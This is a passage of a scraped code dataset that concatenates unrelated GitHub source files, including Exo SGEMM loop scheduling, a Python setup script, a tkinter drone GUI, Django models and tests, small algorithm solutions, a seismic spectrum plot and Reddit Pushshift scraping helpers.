\"sgemm_above_kernel\")\n # Split up into cases\n p = divide_loop(p, \"j\", N_REG_BLK, [\"jo\", \"ji\"], tail=\"cut_and_guard\")\n p = divide_loop(p, \"i\", M_REG_BLK, [\"io\", \"ii\"], tail=\"cut_and_guard\")\n p = fission(p, p.find(\"for jo in _: _ #0\").after(), n_lifts=2)\n p = reorder_loops(p, \"ii jo #0\")\n p = fission(p, p.find(\"for io in _: _\").after())\n p = fission(p, p.find(\"for io in _: _ #1\").after())\n p = reorder_loops(p, \"k io #0\")\n p = reorder_loops(p, \"k jo #0\")\n p = lift_if(p, \"if N % 64 > 0: _ #0\", n_lifts=3)\n p = reorder_loops(p, \"k io\")\n p = lift_if(p, \"if M % 6 > 0: _ #0\")\n p = fission(p, p.find(\"for jo in _: _ #1\").after(), n_lifts=2)\n p = reorder_loops(p, \"ii jo\")\n p = reorder_loops(p, \"k jo\")\n p = lift_if(p, \"if N % 64 > 0: _ #1\", n_lifts=2)\n # Main block\n p = replace_all(p, basic_kernel_Mx4[6])\n p = call_eqv(p, basic_kernel_Mx4[6], sgemm_kernel_avx512_Mx4[6])\n # Right panel\n p = replace_all(p, right_panel_kernel)\n p = call_eqv(p, right_panel_kernel, right_panel_kernel_scheduled)\n # Bottom panel\n p = replace_all(p, bottom_panel_kernel)\n p = call_eqv(p, bottom_panel_kernel, bottom_panel_kernel_scheduled)\n ## TODO: bottom-right tile\n p = simplify(p)\n return p\n\n\nsgemm_above_kernel = make_sgemm_above_kernel()\n\n\ndef make_sgemm_exo(p=SGEMM):\n p = rename(p, \"sgemm_exo\")\n # Split all loops\n p = divide_loop(p, \"k\", K_L1_BLK, [\"ko\", \"ki\"], tail=\"cut_and_guard\")\n p = repeat(divide_loop)(p, \"i\", M_L1_BLK, [\"io\", \"ii\"], tail=\"cut_and_guard\")\n p = repeat(divide_loop)(p, \"j\", N_L1_BLK, [\"jo\", \"ji\"], tail=\"cut_and_guard\")\n # Explode into 8 cases\n for i in range(0, 2):\n p = fission(p, p.find(f\"for io in _:_ #{i}\").after(), n_lifts=2)\n for i in range(0, 4):\n p = fission(p, p.find(f\"for jo in _:_ #{i}\").after(), n_lifts=4)\n # Case 1:\n p = repeat(reorder_loops)(p, \"ki io\")\n p = repeat(reorder_loops)(p, \"ii jo\")\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 2:\n p = lift_if(p, \"if N%64 > 0: _ #0\", n_lifts=4)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 3:\n p = lift_if(p, \"if M%264 > 0: _ #0\", n_lifts=2)\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 4:\n p = lift_if(p, \"if M%264 > 0: _ #1\", n_lifts=2)\n p = lift_if(p, \"if N%64 > 0: _ #1\", n_lifts=3)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 5:\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 6:\n p = lift_if(p, \"if N%64 > 0: _ 
#2\", n_lifts=3)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 7:\n p = lift_if(p, \"if M%264 > 0: _ #2\")\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 8:\n p = lift_if(p, \"if M%264 > 0: _ #3\")\n p = lift_if(p, \"if N%64 > 0: _ #3\", n_lifts=2)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n ##\n ## Case 1 memory staging\n p = stage_window(p, \"A[_] #0\", \"A1_cache\", DRAM_STATIC)\n p = stage_window(p, \"B[_] #0\", \"B1_cache\", DRAM_STATIC)\n p = autolift_alloc(p, \"A1_cache : _\", n_lifts=3)\n p = autolift_alloc(p, \"B1_cache : _\", n_lifts=3)\n p = autofission(p, p.find_loop(\"i0 #0\").after())\n ### Case 2 memory staging\n p = stage_window(p, \"B[_] #1\", \"B2_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B2_cache\", [None, \"64\"], unsafe_disable_checks=True)\n p = lift_alloc(p, \"B2_cache\")\n p = autofission(p, p.find_loop(\"i0 #2\").after())\n ## Case 3 memory staging\n p = stage_window(p, \"B[_] #2\", \"B3_cache\", DRAM_STATIC)\n ## Case 4 memory staging\n p = stage_window(p, \"B[_] #3\", \"B4_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B4_cache\", [None, \"64\"], unsafe_disable_checks=True)\n ## Case 5 memory staging\n p = stage_window(p, \"B[_] #4\", \"B5_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B5_cache\", [\"512\", None], unsafe_disable_checks=True)\n ## Case 6 memory staging\n p = stage_window(p, \"B[_] #5\", \"B6_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B6_cache\", [\"512\", \"64\"], unsafe_disable_checks=True)\n ## Case 7 memory staging\n p = stage_window(p, \"B[_] #6\", \"B7_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B7_cache\", [\"512\", None], unsafe_disable_checks=True)\n ## Case 8 memory staging\n p = stage_window(p, \"B[_] #7\", \"B8_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B8_cache\", [\"512\", \"64\"], unsafe_disable_checks=True)\n ## Replace SGEMM_WINDOW with optimized form\n # These must come AFTER bound_alloc since the internal check-effects\n # is a whole program analysis that is VERY expensive\n p = repeat(call_eqv)(p, SGEMM_WINDOW, sgemm_above_kernel)\n # Clean up\n p = simplify(p)\n return p\n\n\nsgemm_exo = make_sgemm_exo()\n\nif __name__ == \"__main__\":\n # print(sgemm_above_kernel)\n print(sgemm_exo)\n\n__all__ = [\"sgemm_exo\"]\n","repo_name":"exo-lang/exo","sub_path":"apps/x86/sgemm/sgemm.py","file_name":"sgemm.py","file_ext":"py","file_size_in_byte":12195,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"53"} +{"seq_id":"35123966225","text":"from distutils.core import setup\nfrom setuptools import find_packages\n\nVERSION = '0.9.1'\n\nsetup(\n name='homematicip',\n packages=find_packages(exclude='tests'),\n version=VERSION,\n description='An API for the homematicip cloud',\n author='Heimo Stieg',\n author_email='stieg@corona-bytes.net',\n url='https://github.com/coreGreenberet/homematicip-rest-api',\n download_url='https://github.com/coreGreenberet/homematicip-rest-api/tarball/' + VERSION,\n keywords=['homematicip'], # arbitrary keywords\n classifiers=['Development Status :: 4 - Beta', 'Programming Language :: Python :: 3 :: Only'],\n install_requires=[\"requests\", \"websocket-client\", \"future\", \"websockets\", \"aiohttp\"],\n scripts=['hmip_cli.py', 'hmip_generate_auth_token.py']\n)\n","repo_name":"acaporrini/homematicip-rest-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} 
+{"seq_id":"69808885289","text":"import tkinter as tk\r\nimport laptopR\r\nimport laptopS\r\nimport threading\r\nimport KeybourdD\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Simple GUI\")\r\nroot.geometry(\"1280x720\")\r\nroot.configure(bg=\"#1F1F1F\")\r\n\r\n\r\n\r\n\r\nthreading.Thread(target=laptopR.main).start()\r\nthreading.Thread(target=KeybourdD.main).start()\r\nthreading.Thread(target=laptopS.main).start()\r\n\r\ndef Update():\r\n if laptopR.MessageContent != []:\r\n angle_x.delete(0, \"end\")\r\n angle_y.delete(0, \"end\")\r\n Yaw_z.delete(0, \"end\")\r\n angle_x.insert(0,laptopR.MessageContent[0])\r\n angle_y.insert(0,laptopR.MessageContent[1])\r\n Yaw_z.insert(0,laptopR.MessageContent[2])\r\n laptopS.message = KeybourdD.message\r\n root.after(15, Update)\r\n\r\n\r\n\r\nip = tk.Entry(root,font=100)\r\nip.insert(0, \"192.168.1.171\")\r\nip.config(state=\"readonly\")\r\nip.place(x=500,y=10)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#message shower\r\nangle_x = tk.Entry(root,font=15,width=5)\r\nangle_x.place(x=500,y=500)\r\nangle_y = tk.Entry(root,font=15,width=5)\r\nangle_y.place(x=560,y=500)\r\nYaw_z = tk.Entry(root,font=15,width=5)\r\nYaw_z.place(x=620,y=500)\r\n#message sender\r\n\r\n\r\n\r\nroot.after(15, Update)\r\nroot.mainloop()","repo_name":"WaseemALTamer/UAV-Python","sub_path":"Laptop/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37999756394","text":"from system.core.model import Model\n\nclass Product(Model):\n def __init__(self):\n super(Product, self).__init__()\n\n def add_item(self, info):\n query = \"INSERT INTO products(name, description, price, created_on, updated_on) VALUES(:name, :description, :price, now(), now())\"\n data = {\n 'name': info['name'],\n 'description': info['description'],\n 'price': info['price']\n }\n self.db.query_db(query, data)\n\n def get_all_items(self):\n query = \"SELECT id, name, description, price FROM products\"\n return self.db.query_db(query)\n\n def get_one_item(self, info):\n query = \"SELECT id, name, description, price FROM products WHERE id = :id\"\n data = {\n 'id': info\n }\n return self.db.query_db(query, data)\n\n def update_item(self, info):\n query = \"UPDATE products SET name = :name, description = :description, price = :price, updated_on = now() WHERE id = :id\"\n data = {\n 'name': info['name'],\n 'description': info['description'],\n 'price': info['price'],\n 'id': info['id']\n }\n self.db.query_db(query, data)\n\n def delete_item(self, info):\n query = \"DELETE FROM products WHERE id = :id\"\n data = {\n 'id': info['id']\n }\n return self.db.query_db(query, data)","repo_name":"jbenammi/Pylot-SemiRestful","sub_path":"app/models/Product.py","file_name":"Product.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8690592349","text":"from typing import List\nclass Solution:\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n local_max = 0\n local_min = 0\n glob_max = min(A)\n glob_min = min(A)\n for i in range(len(A)):\n if A[i] < A[i] + local_max:\n local_max += A[i]\n else:\n local_max = A[i]\n if A[i] < A[i] + local_min:\n local_min = A[i]\n else:\n local_min += A[i]\n if glob_max < local_max:\n glob_max = local_max\n if glob_min > local_min:\n glob_min = local_min\n print(glob_max, glob_min)\n if sum(A) == glob_min:\n return glob_max\n return glob_max if glob_max > sum(A) - glob_min else sum(A) 
- glob_min\n ","repo_name":"nailerHeum/ps_dir","sub_path":"leetcode/maximum_sum_circular_subarray.py","file_name":"maximum_sum_circular_subarray.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21530696717","text":"#!/usr/bin/env python\nfrom obspy.core import UTCDateTime, read, Stream\nimport matplotlib.pyplot as plt\nfrom scipy.signal import periodogram\nimport numpy as np\nimport math\nfrom obspy.clients.fdsn import Client\nfrom scipy import signal\n\nimport matplotlib as mpl\nmpl.rc('font', family='serif')\nmpl.rc('font', serif='Times')\nmpl.rc('text', usetex=True)\nmpl.rc('font', size=18)\n\n\n\nmf, Mf = 2, 6\nhours = 26\nstime = UTCDateTime(UTCDateTime('2022-01-15T04:14:00'))\n\n\nst = read('./tonga_bp.mseed')\n\n\nst.detrend('linear')\nst.merge(fill_value=0)\nst.trim(stime,stime+hours*60*60)\nfor tr in st:\n tr.data *= 100\n\n\nfig, ax = plt.subplots(2, 1, figsize=(16, 12))\nax = ax.flatten()\nst2 = st.copy()\n\n\n# filter between 2.5 and 5 mHz\nst2.filter('bandpass', freqmin=1/400, freqmax=1/200)\nax[0].plot(st2[0].times()/(60*60), st2[0].data,\n alpha=0.5, color='C0', label='AGBOM TONGA')\n\n\nf_mHz = 3.68\n\ndays = 1.5\nwo = 2*np.pi*(f_mHz/1000.)\nAo = np.max(st2[0].data)/2.\nQ_True = 117\n\n#t = np.arange(0,24*days*3600.)\nt = st2[0].times()\n\nSynthetic = Ao*np.exp((-wo*t)/(2*Q_True))*np.sin(wo*t)\n\n\nax[0].plot(st2[0].times()/(60*60), Synthetic,\n alpha=0.5, color='C8', label='Synthetic Q=117')\nax[0].set_ylabel('Pressure (Pa)')\nax[0].set_xlabel('Time (hr.)')\nax[0].set_xlim((min(st2[0].times()/(60*60)), max(st2[0].times()/(60*60))))\nax[0].legend(loc='upper right', ncol=2)\n\n\n# Window\nfor tr in st:\n tr.data *= signal.get_window(('kaiser', 2. 
* np.pi), tr.stats.npts)\n\nNFFT = 2 ** (math.ceil(math.log(st[0].stats.npts, 2)))\nprint('Window Length is:', NFFT)\n\n\nfor idx, tr in enumerate(st):\n\n f, p = periodogram(tr.data, fs=tr.stats.sampling_rate,\n nfft=NFFT, scaling='spectrum')\n p, f = p[1:], f[1:]\n\n # Now have p in nm/s/s switch f to mHz\n f *= 1000.\n p = p[(f >= mf) & (f <= Mf)]\n f = f[(f >= mf) & (f <= Mf)]\n if idx == 0:\n ln1 = ax[1].plot(f, p, label='AGBOM TONGA',\n alpha=0.3, color='C0')\n ax[1].fill_between(f, 0, p, alpha=0.7)\n ax[1].set_xlim((mf, Mf))\n ax[1].set_ylabel('Amplitude (Pa)')\n #ax[1].tick_params(axis='y')\n ax[1].set_xlabel('Frequency (mHz)')\n ax[1].set_ylim((0, 1.1*max(p)))\n else:\n ax2 = ax[1].twinx()\n ln2 = ax2.plot(f, p, label='AGBOM TONGA',\n alpha=0.3, color='C5')\n ax2.fill_between(f, 0, p, alpha=0.7, color='C5')\n ax2.set_ylabel('Amplitude ($\\mu m/s)$', color='C5')\n ax2.tick_params(axis='y', labelcolor='C5')\n ax2.set_ylim((0, 1.1*max(p)))\n\n# Modes from PREM calculated by MINEOS\nax[1].plot([3.68, 3.68], [-1, 40], color='C1', alpha=0.7)\nax[1].plot([4.40, 4.40], [-1, 40], color='C2', alpha=0.7)\nax[1].plot([3.63, 3.63], [-1, 40], color='C3', alpha=0.7)\nax[1].plot([3.72, 3.72], [-1, 40], color='C4', alpha=0.7)\n\n\nax[1].text(3.68, 0.3, '$_0S_{28} - _0S_{29}$',\n color='C1', alpha=0.7, ha='center', fontsize=22)\nax[1].text(4.40, 0.3, '$_0S_{36} - _0S_{37}$',\n color='C2', alpha=0.7, ha='center', fontsize=22)\nax[1].text(3.53, .25, '$_0S_{28}$', color='C3',\n alpha=0.7, ha='center', fontsize=22)\nax[1].text(3.82, .25, '$_0S_{29}$', color='C4',\n alpha=0.7, ha='center', fontsize=22)\nax[1].text(1.62, 0.3, '(b)')\nax[0].text(-2.5, 410, '(a)')\n\nplt.savefig('Figure10.PNG', format='PNG', dpi=400)\nplt.savefig('Figure10.PDF', format='PDF', dpi=400)\n\n#plt.show()\n","repo_name":"aringler-usgs/tonga_paper","sub_path":"figure10.py","file_name":"figure10.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70243300649","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 21:28:56 2021\n\n@author: hungd\n\"\"\"\n\ndef mergeOverlappingIntervals(intervals):\n # Write your code here.\n \n intervals = sorted(intervals, key=lambda x: x[0])\n overlappingIntervals = [intervals[0]]\n for i in range(1, len(intervals)):\n \tif intervals[i][0] <= overlappingIntervals[-1][1]:\n \t\toverlappingIntervals[-1][1] = max(intervals[i][1], overlappingIntervals[-1][1])\n \telse:\n \t\toverlappingIntervals.append(intervals[i])\n return overlappingIntervals\n\nintervals = [\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9],\n [1, 10]\n ]\nmergeOverlappingIntervals(intervals)\n","repo_name":"hungdoan888/algo_expert","sub_path":"overlappingIntervals.py","file_name":"overlappingIntervals.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37067520817","text":"class Parent:\n # self 인자가 없을 경우, 인스턴스 생성 시에 사용할 수 없다\n def function1():\n print('non self function called!')\n\n def function2(self):\n print('self function called!')\n\n\nParent.function1()\n\nParent().function2()\n\nprint()\nprint()\n\n\nclass Foo():\n bar = 'A'\n\n def __init__(self):\n self.bar = 'B'\n\n class Bar():\n bar = 'C'\n\n def __init__(self):\n self.bar = 
'D'\n\n\nprint(Foo.bar)\nprint(Foo().bar)\nprint(Foo.Bar.bar)\nprint(Foo.Bar().bar)\n","repo_name":"junh0328/prepare_algorithm","sub_path":"python_basic/quiz2_4.py","file_name":"quiz2_4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39545998047","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('product', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Stock',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('stock', models.IntegerField()),\n ('product', models.ForeignKey(to='product.Product')),\n ],\n ),\n migrations.CreateModel(\n name='Warehouse',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(default=b'Default', unique=True, max_length=100)),\n ],\n ),\n migrations.AddField(\n model_name='stock',\n name='warehouse',\n field=models.ForeignKey(to='stock.Warehouse'),\n ),\n ]\n","repo_name":"marcuslind90/lindshop","sub_path":"core/stock/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14742936328","text":"\"\"\"\nUma classe vai se relacionar com a outra, mas elas continuam sendo independentes.\nExemplo: Um escritor e uma caneta e uma máquina de escrever\nRelacionar essas três classes.\n\n\"\"\"\nfrom classe import Escritor\nfrom classe import Caneta\nfrom classe import MaquinaDeEscrever\nescritor = Escritor('Joãozinho')\ncaneta = Caneta('Bic')\nmaquina = MaquinaDeEscrever()\nprint(escritor.nome)\nprint(caneta.marca)\nmaquina.escrever()\n# Criando uma associacao\nescritor.ferramenta = caneta\nescritor.ferramenta.escrever()\n\n","repo_name":"eliasantoniorodrigues1/POO_python","sub_path":"associacao.py","file_name":"associacao.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392339423","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom data import DatasetSeq, DatasetInterDomain, DatasetPDB\nfrom model import BERTLM, BERT\nfrom trainer import BERTTrainer\nimport options\nfrom torch.utils.data import DataLoader, DistributedSampler, RandomSampler\nfrom torch import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as pl\n\n\ndef load_dataset(args):\n if args.task == 'pfam':\n train_data_path = args.train_dataset\n print(\"Loading Train Dataset\", train_data_path)\n train_dataset = DatasetSeq(train_data_path, seq_len=args.seq_len, seq_mode=args.seq_mode,\n relative_3d=args.relative_3d,\n relative_3d_size=10, relative_3d_step=2)\n else:\n raise ValueError('unknown task name')\n\n return train_dataset\n\n\nparser = options.get_training_parser()\nargs = options.parse_args_and_arch(parser)\n\n\n# GPU mode: 0 - 1 gpu, 1 -- 1 Node, 2 -- multi Nodes\ngpu_mode = 1\nif not torch.cuda.is_available():\n gpu_mode = 0\n\nif (gpu_mode == 1) & torch.cuda.is_available():\n device = torch.device(\"cuda:0\")\nelse:\n device = torch.device(\"cpu\")\n\n\ntrain_dataset = load_dataset(args)\n\nprint(\"Creating Dataloader\")\n\n# datasampler = 
RandomSampler(train_dataset)\n# train_data_loader = DataLoader(train_dataset, batch_size=args.batch_size,\n# num_workers=args.num_workers, sampler=datasampler)\n\n# build model\nprint(\"Building BERT model\")\nmodel = BERT(len(train_dataset.vocab),\n hidden=args.hidden, n_layers=args.layers, attn_heads=args.attn_heads,\n seq_mode=args.seq_mode,\n abs_position_embed=args.abs_position_embed,\n relative_attn=args.relative_attn,\n relative_1d=args.relative_1d,\n max_relative_1d_positions=10,\n relative_3d=args.relative_3d,\n relative_3d_vocab_size=len(train_dataset.vocab_3d),\n visual=True)\n\nif args.restart:\n print(\"reload pretrained BERT model\")\n model.load_state_dict(torch.load(args.restart_file, map_location=torch.device('cpu')))\n\nmodel.to(device)\n\ntorch.set_grad_enabled(False)\n\nprint(model.visual)\n\nitem = 2\ndata = train_dataset[item]\n\ndata = {key: value.unsqueeze(0).to(device) for key, value in data.items()}\n\nx, output = model.forward(data[\"bert_input\"], distance_matrix=data[\"dist_mat\"])\n\n\nfor param in model.embedding.token.parameters():\n eb_vec = param\n\nfor att in output['attention']:\n pl.figure()\n pl.imshow(att[0].numpy()[2])\n pl.colorbar()\n\npl.figure()\npl.imshow(x[0].numpy())\npl.colorbar()\n\n\n","repo_name":"lahplover/unippi","sub_path":"visual_bert.py","file_name":"visual_bert.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20401711784","text":"import sys\nimport os\nimport django\n\nBASE = os.path.dirname(__file__)\nROOT = os.path.abspath(\n os.path.join(\n BASE,\n \"../src\"\n )\n)\n\n\nsys.path.insert(0, ROOT)\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"main.settings\"\ndjango.setup()\n","repo_name":"biplobe6/initial_task","sub_path":"live-editor/add_root.py","file_name":"add_root.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31277973590","text":"import hashlib\nimport sys\n\ndef criar_hash():\n\tnome_arquivo = input(\"\\nInforme o nome do arquivo: \")\n\tler_arquivo = open(nome_arquivo, 'rb').read()\n\thash_md5 = hashlib.md5(ler_arquivo)\n\tglobal hash_arquivo \n\thash_arquivo = hash_md5.hexdigest()\n\tprint(\"\\nHash do arquivo: \", hash_arquivo)\n\treturn hash_arquivo\n\ncriar_hash()\n\ndef verificar_integridade(hash_arquivo):\n\thash_antigo = hash_arquivo\n\thash_atual = criar_hash()\n\tif(hash_antigo == hash_atual):\n\t\tprint(\"\\nO arquivo está íntegro.\")\n\telse: print(\"\\nO conteúdo do arquivo foi modificado!\")\n\ndef menu():\n\topcao = input(\n \"\\nEsoclha uma opção:\\n\\n1 - Verificar a integridade do arquivo\\n2 - Sair\\n\\n\")\n\n\tif(opcao == \"1\"):\n\t\tverificar_integridade(hash_arquivo)\n\t\tmenu()\n\n\tif(opcao == \"2\" or opcao != \"1\"):\n\t\tsys.exit()\n\nmenu()\n","repo_name":"lucas-leoni/Tpi-Seguranca","sub_path":"hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4223301323","text":"from abc import ABC, abstractmethod\nfrom argparse import ArgumentParser, Namespace\nfrom typing import List\n\n\nclass BaseParser(ABC):\n @property\n @abstractmethod\n def description(self) -> str:\n ...\n\n @property\n @abstractmethod\n def aliases(self) -> List[str]:\n ...\n\n def __init__(self, subparser):\n name, *aliases = self.aliases\n self._argparser: ArgumentParser = 
subparser.add_parser(\n name, aliases=aliases, help=self.description\n )\n self._argparser.set_defaults(func=self.parse)\n\n @abstractmethod\n def parse(self, args: Namespace) -> None:\n ...\n","repo_name":"ParsaAlizadeh/universal-parser-tool","sub_path":"upt/baseparser.py","file_name":"baseparser.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16639757657","text":"import boto\nfrom boto.ec2.cloudwatch.alarm import MetricAlarm\nimport sure # noqa\n\nfrom moto import mock_cloudwatch\n\n\n@mock_cloudwatch\ndef test_create_alarm():\n conn = boto.connect_cloudwatch()\n\n alarm = MetricAlarm(\n name='tester',\n comparison='>=',\n threshold=2.0,\n period=60,\n evaluation_periods=5,\n statistic='Average',\n description='A test',\n dimensions={'InstanceId': ['i-0123456,i-0123457']},\n alarm_actions=['arn:alarm'],\n ok_actions=['arn:ok'],\n insufficient_data_actions=['arn:insufficient'],\n unit='Seconds',\n )\n conn.create_alarm(alarm)\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(1)\n alarm = alarms[0]\n alarm.name.should.equal('tester')\n alarm.comparison.should.equal('>=')\n alarm.threshold.should.equal(2.0)\n alarm.period.should.equal(60)\n alarm.evaluation_periods.should.equal(5)\n alarm.statistic.should.equal('Average')\n alarm.description.should.equal('A test')\n dict(alarm.dimensions).should.equal({'InstanceId': ['i-0123456,i-0123457']})\n list(alarm.alarm_actions).should.equal(['arn:alarm'])\n list(alarm.ok_actions).should.equal(['arn:ok'])\n list(alarm.insufficient_data_actions).should.equal(['arn:insufficient'])\n alarm.unit.should.equal('Seconds')\n\n\n@mock_cloudwatch\ndef test_delete_alarm():\n conn = boto.connect_cloudwatch()\n\n alarm = MetricAlarm(\n name='tester',\n comparison='>=',\n threshold=2.0,\n period=60,\n evaluation_periods=5,\n statistic='Average',\n description='A test',\n dimensions={'InstanceId': ['i-0123456,i-0123457']},\n alarm_actions=['arn:alarm'],\n ok_actions=['arn:ok'],\n insufficient_data_actions=['arn:insufficient'],\n unit='Seconds',\n )\n conn.create_alarm(alarm)\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(1)\n\n alarms[0].delete()\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(0)\n","repo_name":"cameron-r/moto","sub_path":"tests/test_cloudwatch/test_cloudwatch.py","file_name":"test_cloudwatch.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"24405830627","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 7 19:23:59 2021\n\n@author: jonas\n\"\"\"\n\n# Get user input\nname = input(\"Enter your name: \")\nage_string = input(\"Enter your age: \")\n\ntry:\n # Convert the user input into an integer\n age = int(age_string)\n \nexcept ValueError:\n # Exit the program, because the user didn't enter the age as integer\n print(\"Your age must be an integer! Exiting the program.\")\n raise SystemExit\n \n# Greet the user.\nprint(f\"Hello, {name}. I heard your {age} years old.\")","repo_name":"AlreadyTakenJonas/pythonBootCamp2021","sub_path":"easyExercise_10_newHelloYou.py","file_name":"easyExercise_10_newHelloYou.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15664551853","text":"from django.urls import path\r\nimport django.conf.urls \r\nfrom . 
import views\r\n# from django.views.decorators.csrf import csrf_exempt\r\n\r\n\r\napp_name = 'turn'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('draw',views.draw, name = 'draw'),\r\n path('rotate',views.rotate, name = 'rotate'),\r\n path('no_prize',views.no_prize, name ='no_prize'),\r\n path('exist',views.exist, name = 'exist'),\r\n \r\n]\r\n","repo_name":"liuchelx/TurnTable","sub_path":"TurnTable/turn/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18159984148","text":"from django.test import Client, TestCase\n\nfrom main.tests.factories.user_factory import UserFactory\n\n\nclass UITestCase(TestCase):\n\n def three_perm_check(self, target, authorized_user, not_logged_in, logged_in, authorised):\n \"\"\"\n\n :param target: target url to request\n :param authorized_user: user that has permissions to access page\n :param not_logged_in: status code expected by not logged in user\n :param logged_in: status code expected by logged in user\n :param authorised: status code expected by an authorised user\n \"\"\"\n c = Client()\n response = c.get(target)\n self.assertEqual(response.status_code, not_logged_in)\n c.force_login(UserFactory())\n response = c.get(target)\n self.assertEqual(response.status_code, logged_in)\n c.force_login(authorized_user)\n response = c.get(target)\n self.assertEqual(response.status_code, authorised)\n","repo_name":"saty9/allez","sub_path":"ui/tests/ui_test_case.py","file_name":"ui_test_case.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24877713124","text":"from psaw import PushshiftAPI\nfrom tqdm import tqdm\n\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\ndef yield_content(search_func, prefix, **search_params):\n api_request_generator = search_func(**search_params)\n for content in api_request_generator:\n to_return = content.d_\n to_return['name'] = prefix + to_return['id']\n yield to_return\n\n\ndef scrape_pushshift(search_funcs, prefixes, **search_params):\n for search_func, prefix in zip(search_funcs, prefixes):\n for content in tqdm(yield_content(search_func, prefix, **search_params),\n 'scraping with ' + search_func.__name__):\n yield content\n\n\ndef rehydrate_content_pushshift(ids):\n comment_ids = list(filter(lambda x: x.startswith('t1_'), ids))\n submission_ids = list(filter(lambda x: x.startswith('t3_'), ids))\n api = PushshiftAPI()\n # need to chunkize because of:\n # NotImplementedError: When searching by ID, number of IDs must be\n # fewer than the max number of objects in a single request (1000).\n for chunk in chunks(submission_ids, 1000):\n for submission in yield_content(api.search_submissions, 't3_', ids=chunk):\n yield submission\n for chunk in chunks(comment_ids, 1000):\n for comment in yield_content(api.search_comments, 't1_', ids=chunk):\n yield comment\n\n\ndef rehydrate_parents_pushshift(things):\n parent_ids = set()\n for thing in things:\n if 'parent_id' in thing:\n parent_ids.add(thing['parent_id'])\n for parent in 